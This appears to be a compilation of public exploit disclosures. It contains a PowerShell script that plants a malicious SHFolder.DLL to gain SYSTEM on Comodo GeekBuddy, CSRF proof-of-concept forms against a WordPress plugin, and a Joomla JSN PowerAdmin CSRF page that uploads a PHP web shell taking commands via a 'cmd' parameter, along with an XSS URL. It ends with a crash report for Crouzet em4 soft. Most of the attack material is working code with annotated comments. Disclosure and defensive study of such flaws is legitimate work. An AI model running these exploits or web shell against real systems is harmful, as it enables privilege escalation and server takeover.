
<#


                                                   ````......````                                                             
                                              ``,;''''''''''''''''';,`                                                        
                                           .;''''''''''''''''''''''''''',`                                                    
                                       `:''''''''+';:,.``````.,:;'''''''''':`                                                 
                                     ,;'''''';,.`                  ``,;'''''';:                                               
                                  `:'''''',.                            `,'''''';.                                            
                                `;+''+':`                  ,;              `,''''';.                                          
                              `;'''';.             ``    .:;'` `.             `;'''''.                                        
                          `  :+''';`          `,``:+''   ';;'`,'';  ``   ``      :'''';`                                      
                           .'''';`           ,';' '':'`  ';,'`'',' :''' .''`       :'''',                                     
                         `;''''`         ;'' :+.` ;';,   ';:' ''''`,;:+ '',         `;''''`                                   
                        .''''.     ;:`, .'.':`'''.:;`;.  +;:' '::; ;''' ';            .'''',                                  
                       :''';`   `  '''',`':'' ..;:`','`  '''' ':;;`'`';`':`   :;        :''';                                 
                      ;''+,     .;`.'.'' ';.'`';': ,:. `  ` ` `,: .';',,'`;'.`';':       .+'''`                               
                    `''''`      ;'; ''.'.,','` ,`                  ``;`''  .`;'`''+:       ;'''`                              
                   `''''    .,  .'' ,'.'' ;;.         ````````         `.  ``'::'`;; `      :'''.                             
                 ``''':    `+,`  .':`'','        `,;''''''''''+'':.`        ;'.+:;'``':      .'''.                            
                 `''',      '',   ''`:;      `:'''''''''''''''''''''';.      `;'`': ''`'`     .''',                           
                `''',   `   `''`  `';     .''''''''''''''''''''''''''''';`    `.;' ;'.''`.:    `''',                          
               `''',     :''.`''   `    ,;'''''''''''''''''''''''''''''''';. `  `,.'::', ''`    .'''.                         
               ''',      '.''`,':     ,'''''''''''''''''''''''''''''''''''''', `  .+,'; '';      .'''`                        
              ''':       ''`'' ;.   `'''''''''''''''''';:::;';'''''''''''''''''.    ;' :': ,,`    .'''                        
             :'';        `''.'`  ` :''''''''''''';:::.',   `''';`:;'+'''','''''+;    `,'; :'''     ,'''                       
            .'''     ``   .++;   `''''''''''''`.     `':    ''';    `:''' :'''''''.   .+ :''.+.     :'':                      
           `''+     :'':   ``   ,'''''''''''''       `':    ''';       `: ,'''''''':   .`''.''   `   '''`                     
           ;''.    `+.',;      ;'''':''''''''; `      ',  .'''':       `  :''''';''';   `'.',`,',    `+''                     
          ,'':      '';,'.    ;''''':''''''''`+`      ;..`;'+''.        '.:''''';'''''```.+'  +:'`    .'';                    
         `'''    `;``+',;.`  ;''''':''''''''.';      `;'',    '`        '' ;''''','''''`    ;,+.+.     ;''.                   
         ;'+.    :'': ;':   ;'''''':''''':',''.      `'';.+'  '`        ,'; .'''';''''''`  `+.':`      `'''                   
        `'':    .+`;''` `  ;'''''':''''''.::''.      .''.     ::        `'';`,'''':''''''`  :+'.        ,'',                  
        '''`    :''.:''   :''''''':'''''; :''''      .'',   `.,;     :+'`''': ;''','''''''   ,`          '''                  
       .'':      `'';``  ,''''''':;''''':`''';',     ,''+` ,+':'     +'''''''`,''''''''''';         .+`  .'':                 
       '''    `''. :',  `''''''':`'''''+.;';.:::::::,,''';`'': .     .'''''''; ''''.''''''',    `  ;'':   '''                 
      .'',    ','';`.   '''''''; :'''''' `,;'''''''''.```   .   ''''';:,`:;''+`'''',,'''''''`    :'';`    `+':                
      '''`    ''.,';   ;'''''';  ''''',`,'''''''''''''.....,,,.`''''''''';;,,;.''''; :'''''''   '''.       ;''                
     `'':     .'';:;  `'''''''` .+'', ,'''''''''''';  '''''''++`''''':..:'''' `'''''  ;'''''',  .,    ``   .'',               
   ` :''        :''`  ''''''+`  ;''``;'''''''''''''':``,,.`````,'''''.       ';.;'''` `'''''''`      .++.   '';               
     +''             ,'''''':   ;+`,'''''''''''''''''+''';;;;'''''''+`       :;+,`''. `.'''''';    .+'''`   :'+`              
    ,''.    ':       +''''';    ,,;''''''''''''''''''''''''''''''''''.  `.::,` `';.',   ;''''''`  :'':  `.  `'';              
    ;''    :;.;':   ,''''''.    `''''';;;,`.:'''''''''''''''''''''''''.;''''''':`;;;,   `''''''; `.;  .;'+`  ;''              
    '': `  ;';';'   '''''';     ''';;''''''',`.'',`   .:;;''''''''''.,'''''''''''.;;.    ,''''''   `;''''.   .''`             
   .''.    .';`;'  .''''''.    :+;;''''''''''': ;'    ::::...;''+'':,'''';..``;''';.      ''''''; `:''.`':   `'':             
   :''     `  ,'`  ;''''''.    :;'''''''''''''';`;,               `,''';` .:;;;'''':      ,''''''   .,''',    '''             
   ;';    ''';,`  `''''''''''` :''''''''''';.:'''`';:`            ,''';`;''''''''''',      ''''''.  ;';,`     :''`            
  `'',   .;,''';  ,'''''''''' ;'''''''''':`   :'''`::`          ``'''',+''''''''''''+`     ;''''';  .``.:;`   `''.            
  .''`   `+;'`;`  '''''''''';.'''''''',`       ''';`             :''';'''';::;'''''';;   ` `''''''`  ;'';;;   `+':            
  :''     ..;''  `''''''''''`'''''''',         .'''`            `+''';''.     ,'''''''''''''''''''''''''''''''''''''':`       
  ;''    :.  ``  .'''''''''';''''''''           ;'';            ;''':::`       :'''''''''''''''''''''''''''''''''''''''',     
  ;':    '''':`  :'''''''''''''''''',`          .'''            ''''.          `+'''''''''''''''''''''''''''''''''''''''''    
  '',    :,;'':  ;''''''''''''''''''`            ;''...        :''''`           :''''''''''''''''''''''''''''''''''''''''''`  
 `''.   `+'':,`  '''''''''''''''''';             ,'';.+`     . ,;'''            `'''''''''''''''''''''''''''''''''''''''''';  
 .''.   `.,;';   '''''''''';''''''',              ''',+. `` .'  .'''             ''''''''+'''''''''''''''''''''''''''''''''', 
 .'+`   ;'''''          ``  '''''''`             `;''''.'++','`+.'''             '''''';                            `;+'''''' 
 ,''                        ''''';;               ,'''';'''';'``.'''             :''''''`                             .'''''':
 :'+                        '''''':               .'''';'''';'` .'''             ,''''''`                              ,''''';
 :''            ,''''',     ''''''`               .'''';'''';', .'''`            .''''''`                               ''''''
 ;''  `'''''';  :''''',     ''''''                .'''';'''';':,''''.            .''''''`                               ''''''
 ;''  `';'''''  :''''',     :'''';                :''''''''';''.'''''            `''''''`                               ;'''''
 ;''            :''''',     ,'''''               `+''''''''':''.'''''`           ,''''';                                ''''''
 :'+            ,''''',     `'''''.              ,'''''''''':''::'''';           ;''''':                               `''''''
 :''      ```.  ,''''':      ''''':             `''''''''''',''+`'''''.         `''''''.                               :''''''
 ,''` `'''''''  .''''';     `''''':             '''''''''''';''',,''''',        '''''''                               ,'''''',
 .''` `''':,.;  `''''''     `'''''':           '''''''''''''';'''`'''''':.   `,''''''',                             .'''''''' 
 `''`  `,;;;''`  ''''''     `'','''';,`     `,''''''''''''''',''':.''''''''''''''''''':`     ;'''''''''''''''''''''''''''''', 
  '',   `+';;,   ''''''     `''`,'''''''''''''''''''''''''''':''''.:''''''''''''''''',+      '''''''''''''''''''''''''''''';  
  '':   `   `,.  ;'''''.    `''' .''''''''''''''''''''''''''''.''''`;''''''''''''''':;;     `''''''''''''''''''''''''''';';   
  ;';    ,'''';  :''''':    `''''``'''''''''''''''''''''''''''`:''''`;''''''''''''';,',     ,'''''''''''''''''''''''''''';    
  ;''    ';;,..  .''''''    `''';;  :''''''''''''''''';'''''''. '''''`;'''''''''''';+'`     ;'''''''''''''''''''''''''';.     
  :''   `,:;'''   ''''''`   `'''`';` `;'''''';,''''''';''''''', .'''''..''''''''''''+:      '''''''';''''''''';''''';,`       
  .''.   .''',`   ;''''': `  ''':;''.  ````` :+'''''',;''''''',  '''''';..;''''''''''`     `''''''    `,'':   `+':            
   '':    `  .;.  ,'''''+    .'';,'''''''';:''''''''','''''''':  ;'''''''''.`,'''''''      ;''''';  ,'',      .''.            
   '';     :+.++` `''''''.   +'''`'''''''''''''''''''.''''''''', .''';;'':,,'''''''',      ''''''.  ':''',    :''`            
   :''    ,';:.'.  ;''''''   ''''.:''''''''''''''''';;'''''''''''.'''.  `:;'''''':'':     :''''''   ';,.:'    '''             
   .''.   .;:'''   .''''''` ,'''':`''''''''''''''''':''''''''''';''''.`;'''''''''.'''',   '''''':   ,'''',   `'':             
    '';    ;';, ;`  '''''';.+''''' ''''''''''''''''':''''''''''': :'':'''''''''',;''''': :'''';'   ,. .;:    ,''`             
    ;''       `;', `,'''''''''''''.,'''''''''''''';','''';:.``   `,.;'''''''''''.+''''''.'''''';  ,'+'.      '''              
    .''.    '''';`   ''''';''''''';`'''''''''''''':.'';:,;'''':`  ,:`:''''''''','',`:''':''''''`  '.:'''    `'':              
     '''   :'': `:.  ,'''';;'''''''`;'''''''''''',:';`:'',,``.:'. `':`+''''''';:'',':';.'''''';  `'''..'    :''               
     :''`  `,. ;:++`  ''''';,'''''';`''''''''''';;',.''....,.. ,';:.'.`'''''''.'''','';+''''''  ;. ,+''`    '';               
     `'':    `'',`;:  `'''''',''''''.:''''''''''`+.,';:''''''';.:''':'`,''''''`'''':''''''''', :':;` ,'    ,'',               
      ;''`   `+.''+` ` :'''''','''''' '''''''''' `.'''''''''''''::'''', +'''':,''''`;''''''''  +.''+;      '''                
      `'':    ;'';` `   ''''''':''''';`'''''''',  '''''''''''''''.,''''`''''',:''''`,'''''''`  '''.:';    .'':                
       ''+`    ,`  ,+:  `'''''','''''':`'''''''` :''''''''''''';   ;'''`+''''`;'''':+''''''.` ` :'':;,    '''                 
       .'':     ;';''.   .'''''';'''''',`'''''+  ''''''''''''''`  .,'';.''''' '''''''''''':   +'``;';    .'',                 
        ''+`    :''; ,'`  :''''','''''''.,''''' ,''''''''''''''  :''''';''''','''';'''''';   ,.''. .``   '''                  
        `';;    `+. ;'':'  :''''':'''''''.:'''; ;''''''''''''': `'''''''''''.'''''.''''''   :';`'';     :''.                  
         :'',`    `'':.''`  ;'''';;:''''''`'''; '''''''''''''': .'''''''''''.''',;''''''   ` :''.'''`  `'''                   
          '''     ;'.:''`    ;''''';:''''':''';.'';''''''''''': ,'''''''''':;'':+''''''`  .''``'+',:   '''`                   
          .';;    `;;';   `   :''''':'''''';'''`'';''''''''''': ,''''''''''`''';''''';    .,''` :`    ,'':                    
           ;'',    `',   `'.   ,''''';''''';'''''':''''''''''': .''''''''',`+';,'''';    ``.''';    ``'''                     
            '''`        `'';: ` .'''':'''''`'''''';;''''''''''; `'''';'''',.`''+,'',   ,'`:'''''`    '''`                     
            .'''        ;'.''    `;''''''''.''''''':'''';:,''';. ,''';''''',;'''',`   `;''''''';.   ;'',                      
             ,'';      ''.;',      ,';''''';,''''''`+,`   .;:;''',,'';'''+.;''''',```:+,''''''''''.:'';                       
              ;'';    ''';',   '.   `,''''''.'''''' `.:;'+''''+''';.,.''':,''''''` ``'''''''''''''',''                        
               ''':   .,,':   :':    +''''''',''';.:'+,.`     `.:''':`''''''''''; `'':'''''''''''''',`                        
                ''':     `   .''  `'`;'''''''..,.:+,`   ``.,.`    ,'''`;'''''''+.';'.:'''':;'''''+:.'`                        
                 ''':     ;:`+'`  ,:..,''''''; .+:   `:'+''''';`    ;'; .''''': `:';:+''';`''''''. .':                        
                 `''';    ; ;'.    .';'`;'''',;'.   .+''''''''''`    ;;'+:'''; .+'''''''';''''''.;,'';                        
                  `''''    ,';     :'`'`;'''':+`   `'''''''''''':     ;'';'''`;''''''''''''''''',.''';                        
                   `''''  ` `      `':. ';''.+.    `'''''''''''';     `'''''::'''.'''',`'''''': :';;''                        
                     ''''.        :;,'`:'.';',      '''''''''''':      ,'''','''..''': '''';;:,''. `''                        
                      :''':      `.+'' '''','       :''''''''''+.       ''''''':`'''' .''';:;`.'.:' ';                        
                       ,''''`      `,` ',;:'. `;;;,``'''::::;''; :';,   ,'''''' ;'''` +'''.''+'.:'+`':                        
                        `'''':      `  ;'':'  '''''+;.;  ``  ,:`''''',  `'''''`,'''' :'''.''''..''','.                        
                          :''''.        .,': :'''''''.`;'''';` .''''''`  '''':`+'''``''',;'''``''';:'.                        
                           `'''''`      `.'` ''''''';`'''''''': ,''''';  ;'''`''''; ''';:'''. ;''',''                         
                             ,'''''`    `.'` '''''''.'''''''''', +'''''` ,'';.''''`''''`+''' ,''''`.:                         
                               :''''',   .'  '''''''.'''';:.,'''`''''''. .''''''':.''',;'''``;,',' '.                         
                                `:+'''';..;  '''''':,''':'''.:''.'''''': `'`''''' ''''`''': ' ::.:`+                          
                                  `,''''':'  ''''''::''+`''',;''.;''''', `'.'''';`'''.;'''`:.,+`'`,:                          
                                     .;+':'  '''''';.''''';`,'''.''''''` `'.''''.,'''`'''.`;`+;`' +                           
                                        .:+` '''''''`''''''+'''+.''''';  .' ;''' ;''.;,'' ' ''.:``:                           
                                          '. :'''''':.+'''''''',;''''',  ;: ;''; '''.'.,;,,:'' '`'                            
                                          ;; `'''''''``;'''''',`,'''''  `'` ''',.''',.:;`' ''.,.`;                            
                                          .+  ''''''' ` `.,,.`'; ''';   :; `''+`;'';;: :.;`',`; ;`                            
                                           +: `'''''``';;;;;'''', ``   `+. `''' '''::;;:;`;'`;..,                             
                                           ,'  ``.. `+''''''''''+`     :'  `'';`''':. ,.',''.; '                              
                                           `+'      :'''''''''''',    `+.`  '',.''',. :,''''+ ;                               
                                            .',     ;''''''''''''.    ':    ''.,''':` ;.''''.,.                               
                                             :'.    :''''''''''',    ;'`    ''.:''',':;.''':.:                                
                                              ''.     ,:''''',`     ;+`     :'.:'''' ':`''; ;                                 
                                              `'',                 ''.       ::,''''``; :, '                                  
                                                ;+;`             .'+`         ``'':'`,;   '``                                 
                                                 ,'';.        `.'';`            :';'.,;  '.                                   
                                                  `,''';:::::;'''.                ``+;' +`                                    
                                                     `,:''''';,`                     ,,;                                      



SHFolder.DLL Local Privilege Elevation Exploit for Comodo Anti-Virus GeekBuddy Component by @Laughing_Mantis (Greg Linares)

Since it took 146 days to fix a DLL Hijack issue I decided to drop this PoC:

###Technical Geeky Stuff###

GeekBuddy stores several helper applications within the C:\ProgramData\Comodo\lps4\temp folder.
These binaries are individual components of the Comodo Security Suite and are executed whenever
their related function is performed, updated, or uninstalled.

The directory listing is as follows:
10/06/2015  12:08 AM    <DIR>          .
10/06/2015  12:08 AM    <DIR>          ..
10/02/2015  10:43 PM                27 download.cfg
10/02/2015  10:47 PM           637,864 setup_clps_application_vulnerability_monitor_release-4.10.307677.9.exe
10/02/2015  10:44 PM         2,196,272 setup_clps_autoruns_manager_api_release-4.14.330616.6.exe
10/02/2015  10:44 PM           547,088 setup_clps_boot_time_monitor_release-4.12.315371.9.exe
10/06/2015  12:07 AM         1,014,024 setup_clps_browser_addons_api_release-4.0.292287.4.exe
10/02/2015  10:44 PM           554,240 setup_clps_browser_addons_monitor_release-4.12.315370.6.exe
10/06/2015  12:06 AM           950,864 setup_clps_client_transaction_release-4.19.365037.89.exe
10/06/2015  12:08 AM           563,896 setup_clps_cross_selling_installer_monitor_release-4.12.318569.13.exe
10/02/2015  10:43 PM           768,032 setup_clps_cspm_alert_monitor_release-4.19.360508.5.exe
10/06/2015  12:08 AM           581,432 setup_clps_immaturely_closed_sessions_monitor_release-4.21.366534.6.exe
10/02/2015  10:47 PM           459,432 setup_clps_memory_monitor_release-4.10.301764.3.exe
10/02/2015  10:46 PM         1,152,480 setup_clps_system_cleaner_api_release-4.2.292287.3.exe
10/06/2015  12:07 AM         1,989,272 setup_clps_system_cleaner_monitor_release-4.12.317464.8.exe
10/06/2015  12:07 AM           648,912 setup_clps_windows_event_monitor_release-4.19.362032.8.exe
10/02/2015  10:43 PM                 1 survey_version.txt
10/06/2015  12:05 AM    <DIR>          updates

The C:\ProgramData\Comodo\lps4\temp\ folder has the following permission configuration:

C:\ProgramData\Comodo\lps4\temp NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
                                BUILTIN\Administrators:(OI)(CI)(ID)F
                                CREATOR OWNER:(OI)(CI)(IO)(ID)F
                                BUILTIN\Users:(OI)(CI)(ID)R
                                BUILTIN\Users:(CI)(ID)(special access:)
                                                      FILE_WRITE_DATA
                                                      FILE_APPEND_DATA
                                                      FILE_WRITE_EA
                                                      FILE_WRITE_ATTRIBUTES

Notice that the folder grants Users FILE_WRITE_DATA and FILE_WRITE_EA access.  This allows
non-administrator users to create files in the directory, but not to delete or modify
existing files.

Comodo's main service engine is controlled by the SYSTEM service Launcher-Service.exe which resides
in the C:\Program Files (x86)\Common Files\COMODO\ folder.  This service is auto launched by the 
registry key HKLM\System\CurrentControlSet\Services\CLPSLauncher

This binary will then launch Unit_Manager.exe in the C:\Program Files\COMODO\GeekBuddy folder with SYSTEM 
level privileges.  This binary in turn launches the binary C:\Program Files\COMODO\GeekBuddy\unit.exe 
to handle each sub-process in the C:\ProgramData\Comodo\lps4\temp\ folder.

During client connections to update servers and GeekBuddy executions, the unit.exe binary 
launches the binary setup_clps_client_transaction_release-4.19.365037.89.exe.  This setup binary has 
a hard-coded DLL loading procedure that looks for SHFOLDER.DLL in the directory it is 
executed from.

.data:00409240                 dd offset aShfolder     ; "SHFOLDER"
.data:00409244                 dd offset aShgetfolderpat ; "SHGetFolderPathA"

During this delay-load procedure the exe loads SHFOLDER.DLL from its local directory before 
searching the remaining locations of the DLL search path.

By planting a malicious SHFOLDER.DLL in the C:\ProgramData\Comodo\lps4\temp\ and triggering an 
update or client connection to secure servers (which occurs automatically at user login) a user can 
elevate their privileges to SYSTEM and compromise the system fully.


######### GREETZ ######################################################################################
1st off all my new homies in the Vectra Networks Research Team - you guys are seriously legit mad #respect to everyone here. #Humbled

@taviso - keep killing it and thanks for being an inspiration
@bill_billbil - sup girl chicken rico n chill
@tacticalRCE - Its no 100 mile rides but will miss all the good times.  C-ya around mang.
@hellNBak_ - drop tehm greetz like its 2003
@hacksforpancakes - make plans for other NullCon in 2016 ;)
@jduck - we gonna juke some more toyotas next time you come visit
@hdmoore - good luck with your ventures good sir
@jsoo - dont give up good sir - you're doing awesome
@thegrugq - when i grow up i hope im half as wise as you good sir
@daveaitel - Triangular Anus logos are the best
@da_667 - AYYYYYYYYYYYYYY LMAO
@bonovoxly - Clever Girls Wear Pink on Wednesdays
Derek Soeder - Respect to you brother, keep on being awesome
Benny 29A - next time im in CZ lets get beers, im buying
Yuji Ukai - #RESPECT to everything you have ever done and will ever do.  #Ninja
Sizzop - for fixing my greetz

#########################################################################################################


#>

# Script parameters.  The only input is the path of a DLL that will be
# copied into the GeekBuddy temp folder described in the header comment.
Param
(

    [Parameter(ValueFromPipelineByPropertyName = $true)]
    [string]$DLL = ""
)




# Refuse to continue when the supplied path does not exist.
# NOTE(review): with the default value "" this check appears not to reach the
# custom message, because Test-Path rejects an empty Path argument first - confirm.
if (!(Test-Path $DLL))
{
    throw "Fatal Error: The specified file: $DLL does not exist."  
}

# Copy the supplied file into the temp folder under the name the delay-loaded
# import resolves.  This relies on the ACL shown in the header (BUILTIN\Users
# has FILE_WRITE_DATA on the folder).  -Force asks Copy-Item to overwrite an
# existing destination; the header states Users cannot modify existing files,
# so if an SHFolder.dll this user did not create is already present the copy
# presumably fails - verify.
# Defender note: a non-SYSTEM process creating SHFolder.dll in this folder is a
# high-signal file-creation event; the fix is a tighter directory ACL and a
# fully-qualified DLL load path in the setup binary.
Copy-Item -Path $DLL -Destination "C:\ProgramData\Comodo\lps4\temp\SHFolder.dll" -Force

# Console status line.  Note it is printed after the copy above has already run.
Write-Host "Copying $DLL to the Comodo AV GeekBuddy's insecure temp folder as SHFolder.dll" -ForegroundColor Red


# Load WinForms so a tray balloon can tell the operator what to do next.
# LoadWithPartialName is marked obsolete in .NET but still functions in Windows PowerShell.
[void][System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")

$objNotifyIcon = New-Object System.Windows.Forms.NotifyIcon 


# Use the icon of the current process ($pid is the running process id) for the balloon.
$MyPath = Get-Process -id $pid | Select-Object -ExpandProperty Path
# System.Drawing is never loaded explicitly; presumably it is pulled in as a
# dependency of System.Windows.Forms - confirm if this line ever fails.
$objNotifyIcon.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon($MyPath)
$objNotifyIcon.BalloonTipIcon = "Info" 
# The balloon text spans two source lines; the embedded line break is part of the string.
$objNotifyIcon.BalloonTipText = "Hijacked SHFolder.DLL with $DLL.
Now manually update Comodo Anti-Virus using the GUI or Reboot the system to gain SYSTEM Level Privileges" 
$objNotifyIcon.BalloonTipTitle = "@Laughing_Mantis"
 
# Show the balloon (timeout argument in milliseconds; newer Windows versions may
# ignore it).  The NotifyIcon is never disposed, so it may linger in the tray
# until the PowerShell process exits.
$objNotifyIcon.Visible = $True 
$objNotifyIcon.ShowBalloonTip(8000)
            
# Exploit Title: Wordpress More Fields Plugin 2.1 Cross-Site Request Forgery 
# Date: 28-02-2016
# Software Link: https://wordpress.org/support/plugin/more-fields
# Exploit Author: Aatif Shahdad
# Twitter: https://twitter.com/61617469665f736
# Contact: aatif_shahdad@icloud.com
# Category: webapps
 
1. Description
   
The More Fields plugin performs no CSRF token validation for any of its functions, including the add box and delete box options. As a result, a specially crafted attacker-controlled page could cause
a logged-in administrator's browser to add and delete any number of extra fields in any number of additional boxes on the Write/Edit page in the Admin.
   
2. Proof of Concept
 
Login as admin to the wp-admin area at http://example.com/wp-admin. Open the following Proof-Of-Concept with the browser that you used to log in.

POC to add box named ‘test’:

--POC begins--
Add Boxes:

<!-- CSRF PoC (add box).  This is a plain form that replays the plugin's
     "save" request; the victim's browser supplies the administrator session
     cookie.  The entity sequences in the name/value attributes decode to
     ordinary characters (&#95; is "_", &#91;&#93; is "[]", &#44; is ","),
     so the server sees the same request as a normal save.
     Defender note: the fix is a nonce check on the save handler
     (check_admin_referer or wp_verify_nonce). -->
<html>
  <body>
    <!-- NOTE(review): the action URL appears to contain soft-hyphen
         characters (U+00AD) from copy and paste; the genuine WordPress path
         is /wp-admin/options-general.php.  The attribute value is also split
         over two source lines, so as pasted it includes a line break. -->
    <form action="https://example.com/wp­admin/options­general.php?page=more-
fields&action=save&keys=_plugin%2C57UPhPh&navigation=boxes" method="POST">
      <input type="hidden" name="label" value="test" />
      <input type="hidden" name="post&#95;types&#91;&#93;" value="press" />
      <input type="hidden" name="position" value="left" />
      <input type="hidden" name="fields" value="" />
      <input type="hidden" name="ancestor&#95;key" value="" />
      <input type="hidden" name="originating&#95;keys" value="&#95;plugin&#44;57UPhPh" />
      <input type="hidden" name="action" value="save" />
      <!-- Requires a user click; nothing is auto-submitted. -->
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


Removing a box needs only the following simple GET request (assuming the box to delete is named ‘test’):

<!-- CSRF PoC (delete box).  The form has no method attribute, so the browser
     submits it as a GET request, matching the "simple GET request" described
     above.  &#45; is "-", &#95; is "_" and &#44; is ",", so the query the
     server sees is page=more-fields&action=delete&action_keys=_plugin,test.
     Same root cause as the add case: the delete handler accepts the request
     without a nonce. -->
<html>
  <body>
    <!-- NOTE(review): the action URL appears to contain soft-hyphen characters
         (U+00AD) from copy and paste; the genuine path is
         /wp-admin/options-general.php. -->
    <form action="https://example.com/wp­admin/options­general.php">
      <input type="hidden" name="page" value="more&#45;fields" />
      <input type="hidden" name="action" value="delete" />
      <input type="hidden" name="action&#95;keys" value="&#95;plugin&#44;test" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


Note: I have removed the CSRF tokens from the requests as they are redundant and not validated.

--End of POC--


3. Impact

The attacker can add/delete any number of extra fields in any number of additional boxes on the Write/Edit page in the Admin.

4. Solution:
   
Add CSRF token validation to the plugin, or switch to a different plugin. Development of the plugin has ceased, so this is the latest version and no upgraded release is available at this time.
            
---------------------------------------------------------
RatioSec Research Security Advisory RS-2016-001
---------------------------------------------------------

JSN PowerAdmin Joomla! Extension Remote Command Execution Via CSRF and
XSS vulnerabilities
---------------------------------------------------------

Product: JSN PowerAdmin Joomla! Extension
Vendor: JoomlaShine.com
Tested Versions: 2.3.0
Other Vulnerable Versions: Prior versions may also be affected
Vendor Notification: 28th January, 2016
Advisory Publication: 24th February, 2016
CVE Reference: Pending
RatioSec Advisory Reference: RS-2016-001
Risk Level: High
CVSSv3 Base Score: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

---------------------------------------------------------

RatioSec Research has discovered two cross-site request forgery and
reflected cross-site scripting vulnerabilities in JSN PowerAdmin
Joomla! Extension which can be exploited, respectively, to upload PHP
files and run arbitrary HTML and script code in a user's browser
session in context of the affected web site.

1) The application allows users to perform certain actions via HTTP
requests without performing proper checks to verify the requests'
validity. An authenticated user's browser can be forced to upload PHP
files via the extension installer and subsequently execute arbitrary
commands with the web server's privileges by tricking the user into
visiting a malicious web site.

2) Input passed to `identified_name` GET parameter when `package` is
set, `option` is set to `com_poweradmin`, `view` is set to
`installer`, and `task` is set to `installer.install` in
`/administrator/index.php` is not properly sanitised before being
reflected. This can be exploited to run arbitrary HTML and script code
in a user's browser session in context of the affected web site.

---------------------------------------------------------

Proof of Concept

Read the advisory details on the RatioSec Research website for the
proof of concept code.
http://www.ratiosec.com/2016/jsn-poweradmin-joomla-extension-rce-via-csrf-and-xss/

----------------------------------------------------------

Solution

No official solution is currently available.

----------------------------------------------------------

Timeline

- First contact: 27th January, 2016
- Disclosure: 28th January, 2016. Preliminary date set to 10th, February 2016.
- E-mail notice after no response: 02nd February, 2016
- Advisory Publication: 24th February, 2016

----------------------------------------------------------

Advisory URL

http://www.ratiosec.com/2016/jsn-poweradmin-joomla-extension-rce-via-csrf-and-xss/

RatioSec Research

Mail: research at ratiosec dot com
Web: http://www.ratiosec.com/
Twitter: https://twitter.com/ratio_sec



----------------
Proof Of Concept

1) The following HTML page exploits the cross-site request forgery vulnerability and uploads a malicious PHP script system($_GET['cmd']); as /tmp/bd.phtml if visited by a logged-in administrator.

<!-- CSRF PoC for the com_poweradmin installer task.  Defender note: the
     request below carries no anti-CSRF token, so the server-side fix is to
     require one on installer.install (JSession::checkToken() in Joomla);
     an upload of a .phtml file through the extension installer is also a
     useful detection signal. -->
<html>
  <body>
    <script>
      // Builds and sends one forged multipart/form-data POST to the installer
      // task.  It runs in the victim administrator's browser when the button
      // below is clicked.
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        // NOTE(review): the host is the researcher's test instance (localhost/no8/...);
        // the vulnerable part is the query string, not the host.
        xhr.open("POST", "http://localhost/no8/joomla/administrator/index.php?option=com_poweradmin&view=installer&task=installer.install", true);
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        // The boundary declared here is what every delimiter in the hand-built
        // body (the boundary prefixed with two extra dashes) must match.
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------167969427914885435381146171168");
        // withCredentials makes the browser attach the victim's session cookies
        // to this cross-origin request, which is what turns it into CSRF.
        xhr.withCredentials = true;
        // A single multipart part named "package" (the parameter the advisory
        // names) with filename bd.phtml.  "\x3c" is "<" written as an escape,
        // presumably so the HTML parser does not see a script tag inside this
        // inline script.
        var body = "-----------------------------167969427914885435381146171168\r\n" +
          "Content-Disposition: form-data; name=\"package\"; filename=\"bd.phtml\"\r\n" +
          "Content-Type: application/octet-stream\r\n" +
          "\r\n" +
          "\x3cscript language=\"php\"\x3esystem($_GET['cmd']);\r\n" +
          "\r\n" +
          "-----------------------------167969427914885435381146171168--\r\n" +
          "\r\n" +
          "\r\n";
        // Copy the string into a Uint8Array so it is sent as raw bytes rather
        // than re-encoded text.  Code points above 255 would wrap, which does
        // not matter for this ASCII-only body.
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
      }
    </script>
    <!-- Requires one user gesture; nothing here is auto-submitted. -->
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>

The file extension .phtml and the <script language="php"> </script> tags are used here to fool the file validation checks of the Joomla API JFile::upload(). As a result, the backdoor is installed permanently as /tmp/bd.phtml, which the attacker can use later to achieve full system compromise.

Command Execution

2) The following URL exploits the cross-site scripting vulnerability to execute javascript code in a logged-in administrator’s browser.

http://localhost/joomla/administrator/index.php?package=foobar&option=com_poweradmin&view=installer&task=installer.install&identified_name=<img+src%3dx+onerror=alert("RatioSecResearch")>
            

Crouzet em4 soft 1.1.04 Integer Division By Zero


Vendor: Crouzet Automatismes SAS
Product web page: http://www.crouzet-automation.com
Affected version: 1.1.04 and 1.1.03.01

Summary: em4 is more than just a nano-PLC. It is a leading
edge device supported by best-in-class tools that enables
you to create and implement the smartest automation applications.

Desc: em4 soft suffers from an integer division-by-zero flaw when handling
Crouzet Logic Software Document '.pm4' files, resulting in a denial-of-service
condition and possibly loss of data.

---------------------------------------------------------------------
(187c.1534): Integer divide-by-zero - code c0000094 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for image013b0000
*** ERROR: Module load completed but symbols could not be loaded for image013b0000
eax=00000000 ebx=00000000 ecx=55c37c10 edx=00000000 esi=0105b13c edi=0110bb18
eip=013ea575 esp=0064d8b8 ebp=0064d8f4 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210206
image013b0000+0x3a575:
013ea575 f7bf18010000    idiv    eax,dword ptr [edi+118h] ds:002b:0110bc30=00000000
0:000> u
image013b0000+0x3a575:
013ea575 f7bf18010000    idiv    eax,dword ptr [edi+118h]
013ea57b 8d4de0          lea     ecx,[ebp-20h]
013ea57e c745fc00000000  mov     dword ptr [ebp-4],0
013ea585 50              push    eax
013ea586 6808505b01      push    offset image013b0000+0x205008 (015b5008)
013ea58b 51              push    ecx
013ea58c ff15b0575a01    call    dword ptr [image013b0000+0x1f57b0 (015a57b0)]
013ea592 8b870c010000    mov     eax,dword ptr [edi+10Ch]
---------------------------------------------------------------------

Tested on: Microsoft Windows 7 Professional SP1 (EN)
           Microsoft Windows 7 Ultimate SP1 (EN)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
